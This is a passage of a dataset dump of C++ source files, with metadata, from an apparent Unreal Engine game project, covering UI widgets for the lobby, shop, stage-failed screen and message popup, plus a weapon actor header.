UPG_UserWidgetStageFailed::IsAbleViewStagePlayAD()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageFailed::UpdateClearStageLayout()\n{\n\tauto pGameModeStage = 
Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tOverlay_ActiveFlag->SetIsEnabled(bIsClearAmount);\n\tOverlay_DeActiveFlag->SetIsEnabled(!bIsClearAmount);\n\n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tOverlay_ActiveTime->SetIsEnabled(bIsClearTime);\n\tOverlay_DeActiveTime->SetIsEnabled(!bIsClearTime);\n\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tOverlay_ActiveLethal->SetIsEnabled(bIsClearLethal);\n\tOverlay_DeActiveLethal->SetIsEnabled(!bIsClearLethal);\n}\n\nvoid UPG_UserWidgetStageFailed::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->RestartGame();\n}\n\nvoid UPG_UserWidgetStageFailed::OnBtnGoToMainLobby()\n{\n\tUGameplayStatics::OpenLevel(GetWorld(), TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetStageFailed::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetStageFailed::OnADPlayStageVideoClosed()\n{\n\n}\n" }, { "alpha_fraction": 0.7842105031013489, "alphanum_fraction": 0.7877193093299866, "avg_line_length": 20.923076629638672, "blob_id": "e18a3ee7ea9562dd2fbc71122c3a8685baa4d7f1", "content_id": "9ec48a91918e3ff9c5d8505fb0b4c0bac0bb9732", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1142, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetMessagePopup.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetMessagePopup.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetMessagePopup : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tvirtual void SetVisibility(ESlateVisibility InVisibility) override;\n\npublic:\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetTitle(FString kTitle);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetDescription(FString kDescription);\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetValue(int32 nValue);\n\t\npublic :\n\tFOnBtnClickedOK OnBtnClickedOK;\n\tFOnBtnClickedOK_OneValue OnBtnClickedOK_OneValue;\n\nprotected:\n\tUFUNCTION()\n\tvoid OnBtnOK();\n\nprotected :\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_TitleName;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_Description;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UButton* Btn_OK;\n\n\tUPROPERTY(EditAnywhere, Category = \"PG Sound\")\n\tclass USoundBase* PopupPlaySound = nullptr;\n\n\tint32 m_nValue = PG_INVALID_INDEX;\n};\n" }, { "alpha_fraction": 0.7760210633277893, "alphanum_fraction": 0.779241681098938, "avg_line_length": 35.32978820800781, "blob_id": "7b3bbe83c3c93aaf111482509848626632d4b34a", 
"content_id": "774a6a7c1f0754273750b25adfffe582247400ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6865, "license_type": "no_license", "max_line_length": 110, "num_lines": 188, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetMainLobby.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetMainLobby.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"UI/PG_UserWidgetWeaponInventory.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Overlay.h>\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetMainLobby::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t// Overlay Stars earned\n\tOverlay_ActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveFlag\")));\n\tABCHECK(nullptr != Overlay_ActiveFlag);\n\tOverlay_DeActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveFlag\")));\n\tABCHECK(nullptr != Overlay_DeActiveFlag);\n\tOverlay_ActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveTime\")));\n\tABCHECK(nullptr != Overlay_ActiveTime);\n\tOverlay_DeActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveTime\")));\n\tABCHECK(nullptr != Overlay_DeActiveTime);\n\tOverlay_ActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveLethal\")));\n\tABCHECK(nullptr != Overlay_ActiveLethal);\n\tOverlay_DeActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveLethal\")));\n\tABCHECK(nullptr != Overlay_DeActiveLethal);\n\n\tABCHECK(nullptr != Text_FlagValue);\n\tABCHECK(nullptr != Text_TimeValue);\n\tABCHECK(nullptr != Text_LethalValue);\n\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tABCHECK(nullptr != pBtnWeapon);\n\n\t\tpBtnWeapon->SetEnable(false);\n\t\tpBtnWeapon->SetSlotIndex(nIndex);\n\t\tpBtnWeapon->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetMainLobby::OnBtnClickedWeaponSlot);\n\t}\n\n\tABCHECK(nullptr != WB_WeaponInventory);\n\tWB_WeaponInventory->OnBtnClickedClose.AddUObject(this, &UPG_UserWidgetMainLobby::OnCloseWeaponInventory);\n}\n\nFString UPG_UserWidgetMainLobby::GetSelectedStageName()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby, TEXT(\"NONE\"));\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, TEXT(\"NONE\"));\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tif (cpStageData)\n\t\treturn cpStageData->StageName;\n\n\treturn TEXT(\"NONE\");\n}\n\nvoid UPG_UserWidgetMainLobby::UpdateClearStageLayout()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = 
pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tbool bIsClearAmount = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tOverlay_ActiveFlag->SetIsEnabled(bIsClearAmount);\n\tOverlay_DeActiveFlag->SetIsEnabled(!bIsClearAmount);\n\tText_FlagValue->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->M_Amount)));\n\n\tbool bIsClearTime = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tOverlay_ActiveTime->SetIsEnabled(bIsClearTime);\n\tOverlay_DeActiveTime->SetIsEnabled(!bIsClearTime);\n\tText_TimeValue->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Time)));\n\n\tbool bIsClearLethal = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_Lethal);\n\tOverlay_ActiveLethal->SetIsEnabled(bIsClearLethal);\n\tOverlay_DeActiveLethal->SetIsEnabled(!bIsClearLethal);\n\tText_LethalValue->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Multi_Kill)));\n}\n\nvoid UPG_UserWidgetMainLobby::UpdateWeaponSlotLayout()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pSavePlayerData = pGameModeMainLobby->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tABCHECK(nullptr != WB_WeaponInventory);\n\t\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tif (nullptr == pBtnWeapon)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find UserWidgetWeaponBox (Index : %d)\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpBtnWeapon->SetWeaponIndex(pGameModeMainLobby, pSavePlayerData->m_kEquipWeaponTableIndex[nIndex]);\n\n\t\tif (PG_MAX_WEAPON_SLOT - 1 == nIndex)\n\t\t\tpBtnWeapon->SetEnable(pSavePlayerData->m_bExtendWeaponSlot);\n\t\telse\n\t\t\tpBtnWeapon->SetEnable(true);\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby::AllHideIconOpenSlot()\n{\n\tfor (int32 nIndex = 0; nIndex < PG_MAX_WEAPON_SLOT; ++nIndex)\n\t{\n\t\tSetEnableIconOpenSlot(nIndex, false);\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby::SetEnableIconOpenSlot(int32 nSlotIndex, bool bEnable)\n{\n\tFString kSlotName = FString::Printf(TEXT(\"OpenSlot_%d\"), nSlotIndex);\n\tauto BtnWeaponSlot = Cast<UOverlay>(GetWidgetFromName(*kSlotName));\n\tABCHECK(nullptr != BtnWeaponSlot);\n\n\tif (bEnable)\n\t\tBtnWeaponSlot->SetVisibility(ESlateVisibility::HitTestInvisible);\n\telse\n\t\tBtnWeaponSlot->SetVisibility(ESlateVisibility::Hidden);\n}\n\nbool UPG_UserWidgetMainLobby::OnNextSelectStage()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby, false);\n\n\treturn pGameModeMainLobby->SetNextStageID();\n}\n\nbool UPG_UserWidgetMainLobby::OnPrevSelectStage()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby, false);\n\n\treturn pGameModeMainLobby->SetPrevStageID();\n}\n\nvoid UPG_UserWidgetMainLobby::OnBtnClickedWeaponSlot(int32 nSlotIndex)\n{\n\tABCHECK(nullptr != WB_WeaponInventory);\n\n\tAllHideIconOpenSlot();\n\tSetEnableIconOpenSlot(nSlotIndex, true);\n\n\t// 인벤토리 창을 연다.\n\tWB_WeaponInventory->SetOpenSlotIndex(nSlotIndex);\n\tWB_WeaponInventory->SetVisibility(ESlateVisibility::Visible);\n\tWB_WeaponInventory->UpdateWeaponInventory();\n}\n\nvoid 
UPG_UserWidgetMainLobby::OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\t// 인벤토리 창이 닫힘\n\tABCHECK(nullptr != WB_WeaponInventory);\n\tWB_WeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\tAllHideIconOpenSlot();\n\n\tif (PG_INVALID_INDEX != nWeaponIndex)\n\t{\n\t\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeMainLobby);\n\t\tpGameModeMainLobby->SaveWeaponEquipSlot(nSlotIndex, nWeaponIndex);\n\n\t\tUpdateWeaponSlotLayout();\n\t}\n}\n\n" }, { "alpha_fraction": 0.7744373679161072, "alphanum_fraction": 0.7772925496101379, "avg_line_length": 29.538461685180664, "blob_id": "6b3197e2a9d79fac58a04a4e70efcd0731b3b76e", "content_id": "83b926a54eff90a2030d70e623b8b46c1eb528b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6022, "license_type": "no_license", "max_line_length": 217, "num_lines": 195, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenShop.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenShop.h\"\n#include \"UI/PG_UserWidgetSkillSlot.h\"\n#include \"UI/PG_UserWidgetShopWeaponSlot.h\"\n#include \"UI/PG_UserWidgetMainLobby_Renewal.h\"\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetScreenShop::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, BtnGotoLobby);\n\tPG_WIDGET_LINK(UButton, BtnADView);\n\tPG_WIDGET_LINK(UTextBlock, TextADRemainTime);\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetSkillSlot, WB_SkillSlot, eMaxLethalShopItemSlot);\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetShopWeaponSlot, WB_ShopWeaponSlot, eMaxWeaponShopItemSlot);\n\n\tfor (auto ShopWeaponSlot : m_pkWB_ShopWeaponSlot)\n\t{\n\t\tif (ShopWeaponSlot)\n\t\t\tShopWeaponSlot->OnItemBuyWeapon.AddUObject(this, &UPG_UserWidgetScreenShop::UpdateRewardPoint);\n\t}\n\n\t{\n\t\tm_pUserWidgetMessagePopup = CreateWidget<UPG_UserWidgetMessagePopup>(GetWorld(), LoadClass<UPG_UserWidgetMessagePopup>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_MessagePopup.WB_MessagePopup_C'\")));\n\t\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\n\t\tm_pUserWidgetMessagePopup->OnBtnClickedOK.AddUObject(this, &UPG_UserWidgetScreenShop::OnMessagePopupBoxClose);\n\t\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pUserWidgetMessagePopup->AddToViewport(999);\n\t}\n}\n\nvoid UPG_UserWidgetScreenShop::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_WeaponShop);\n\tSetADRemainTime(nRemainTime);\n\tSetBtnEnableAD((nRemainTime <= 0));\n}\n\nvoid UPG_UserWidgetScreenShop::Init()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tTArray<const 
FPGWeaponTableData*> kWeaponTableDatas;\n\tABCHECK(pGameInstance->GetAllWeaponTableData(kWeaponTableDatas));\n\n\tint nSlotIndex = 0;\n\tint nWeaponIndex = 0;\n\tfor (auto WeaponTableData : kWeaponTableDatas)\n\t{\n\t\tif (nSlotIndex >= m_pkWB_ShopWeaponSlot.Num())\n\t\t\tbreak;\n\n\t\tif (false == WeaponTableData->ServiceOpen)\n\t\t{\n\t\t\tnWeaponIndex++;\n\t\t\tcontinue;\n\t\t}\n\n\t\tif (m_pkWB_ShopWeaponSlot[nSlotIndex])\n\t\t{\n\t\t\tm_pkWB_ShopWeaponSlot[nSlotIndex]->SetWeaponIndex(pGameModeMainLobby, nWeaponIndex, nSlotIndex);\n\t\t}\n\n\t\tnSlotIndex++;\n\t\tnWeaponIndex++;\n\t}\n\n\tUpdateRewardPoint();\n\tUpdateLethalShopLayout();\n\tUpdateWeaponShopLayout();\n}\n\nvoid UPG_UserWidgetScreenShop::UpdateLethalShopLayout()\n{\n\tint nLethalIndex = 0;\n\tfor (auto ShopSkillSlot : m_pkWB_SkillSlot)\n\t{\n\t\tif (ShopSkillSlot)\n\t\t{\n\t\t\t// 현재 스킬은 한개만 구현되어 있으므로 임시로 첫번째 스킬 슬롯만 보여주게 한다.\n\t\t\tShopSkillSlot->SetEnable((0 == nLethalIndex));\n\t\t}\n\n\t\tnLethalIndex++;\n\t}\n}\n\nvoid UPG_UserWidgetScreenShop::UpdateWeaponShopLayout()\n{\n\tfor (auto ShopWeaponSlot : m_pkWB_ShopWeaponSlot)\n\t{\n\t\tShopWeaponSlot->UpdateLayout();\n\t}\n}\n\nvoid UPG_UserWidgetScreenShop::SetBtnEnableAD(bool bEnable)\n{\n\tif (m_pkBtnADView->bIsEnabled != bEnable)\n\t\tm_pkBtnADView->SetIsEnabled(bEnable);\n\n\tif (bEnable)\n\t\tm_pkTextADRemainTime->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tm_pkTextADRemainTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetScreenShop::SetADRemainTime(int32 nTime)\n{\n\tm_pkTextADRemainTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetScreenShop::ShowMessageBox(FString kTitle, FString kDescription)\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetTitle(kTitle);\n\tm_pUserWidgetMessagePopup->SetDescription(kDescription);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Visible);\n}\n\nvoid UPG_UserWidgetScreenShop::OnBtnGotoLobby()\n{\n\tauto GameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != GameInstance);\n\n\tif (nullptr == m_pWBMainLobby)\n\t{\n\t\tm_pWBMainLobby = CreateWidget<UPG_UserWidgetMainLobby_Renewal>(this, WB_MainLobbyClass);\n\t\tABCHECK(nullptr != m_pWBMainLobby);\n\t}\n\n\tGetWorld()->GetGameViewport()->RemoveAllViewportWidgets();\n\tm_pWBMainLobby->AddToViewport();\n\tm_pWBMainLobby->UpdateLayoutStage();\n\tm_pWBMainLobby->UpdateLayoutMission();\n\tm_pWBMainLobby->UpdateLayoutWeaponSlot();\n\tm_pWBMainLobby->UpdateRewardPoint();\n}\n\nvoid UPG_UserWidgetScreenShop::OnBtnADView()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_WeaponShop);\n}\n\nvoid UPG_UserWidgetScreenShop::OnADRewardVideoSucessed()\n{\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tint32 nRewardPoint = pGameMode->GetSavePlayerData()->m_nRewardPoint + PG_ADVIEW_SHOP_REWARD;\n\tpGameMode->GetSavePlayerData()->m_nRewardPoint = nRewardPoint;\n\tpGameMode->SavePlayerData();\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\tpMyPlayerState->SetRewardPoint(nRewardPoint);\n\n\tUpdateWeaponShopLayout();\n\tUpdateRewardPoint();\n\tShowMessageBox(TEXT(\"Get Reward Point!\"), TEXT(\"+200 Point\"));\n}\n\nvoid 
UPG_UserWidgetScreenShop::OnADRewardVideoError()\n{\n\tUpdateRewardPoint();\n\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Failed to get the reward.\\nPlease try again later.\"));\n}\n\nvoid UPG_UserWidgetScreenShop::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n}" }, { "alpha_fraction": 0.7890778183937073, "alphanum_fraction": 0.7897318601608276, "avg_line_length": 29.898990631103516, "blob_id": "bec301fb9f7f1b3292456290be03164eb5c27061", "content_id": "c5bba6b9f4bb973480da6c996f9172f9020d4c0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3060, "license_type": "no_license", "max_line_length": 159, "num_lines": 99, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetScreenStageFailed.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetScreenStageFailed.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n#include <Components/TextBlock.h>\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetScreenStageFailed::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t// Popup Title\n\tPG_WIDGET_LINK(UTextBlock, TextTitle);\n\n\t// Mission State\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\n\t// Menu Button\n\tPG_WIDGET_LINK(UButton, BtnHome);\n\tPG_WIDGET_LINK(UButton, BtnRetry);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nbool UPG_UserWidgetScreenStageFailed::IsAbleViewStagePlayAD()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\treturn pGameInstance->IsAbleADView(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::UpdateLayout()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tint32 nSelectedStageID = pGameModeStage->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tSetPopupTitle(cpStageData->StageName);\n\n\tbool bIsClearAmount = pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_AmountKill);\n\tm_pkBtnFlag->SetIsEnabled(bIsClearAmount);\n\tbool bIsClearTime = pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_ClearTime);\n\tm_pkBtnTime->SetIsEnabled(bIsClearTime);\n\tbool bIsClearLethal = pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal) || pGameModeStage->IsWasClearMisiion(EStageClearType::eSCT_Lethal);\n\tm_pkBtnLethal->SetIsEnabled(bIsClearLethal);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::SetPopupTitle(FString kTitle)\n{\n\tABCHECK(nullptr != m_pkTextTitle);\n\tm_pkTextTitle->SetText(FText::FromString(kTitle));\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnBtnHome()\n{\n\tUGameplayStatics::OpenLevel(GetWorld(), 
TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->RestartGame();\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageFailed::OnADPlayStageVideoClosed()\n{\n\n}" }, { "alpha_fraction": 0.760421633720398, "alphanum_fraction": 0.7642549276351929, "avg_line_length": 29.691177368164062, "blob_id": "21baafaea3712d2f83ca581a8e516d8c033272bb", "content_id": "498fa8722b8daa812f48017d36348d510ef77ad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2257, "license_type": "no_license", "max_line_length": 111, "num_lines": 68, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_Weapon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_Weapon.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_Weapon : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\t// Sets default values for this actor's properties\n\tAPG_Weapon();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void OnConstruction(const FTransform& Transform) override;\n\tvirtual void Destroyed() override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\npublic :\n\tbool SetWeaponData(int32 nWeaponTableIndex);\n\n\tvirtual int32\t\t\t\tGetAttackRange();\n\tclass UAnimMontage*\t\t\tGetMontageFireReaction();\n\tconst struct FPGWeaponData* GetWeaponData();\n\tint32\t\t\t\t\t\tGetWeaponAttackDamage();\t// 현재 캐릭터 무기 레벨 상태에 따른 무기 데미지를 반환한다.\n\n\tbool IsOwnerMonster();\t// 몬스터 소유여부\n\tbool IsOwnerMyPlayer();\t// 플레이어 소유여부\n\n\t// 발사 처리\n\tUFUNCTION()\n\tvirtual void Fire();\n\n\tUFUNCTION()\n\tvirtual void StopFire();\n\nprotected :\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tint32 WeaponTableIndex;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGWeaponData WeaponData;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UStaticMeshComponent* Weapon;\n\n\t// 발사체가 생성될 때 해당 위치에 생성되는 이펙트(발사 총구 이펙트).\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UParticleSystemComponent*\tFiringEffect;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UAudioComponent* FireSound;\n\n\t// 무기 발사시 사용되는 애니메이션\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG WeaponInfo\", Meta = (AllowPrivateAccess = true))\n\tclass UAnimMontage* MontageFireReaction;\n};\n" }, { "alpha_fraction": 0.7623931765556335, "alphanum_fraction": 0.7649979591369629, "avg_line_length": 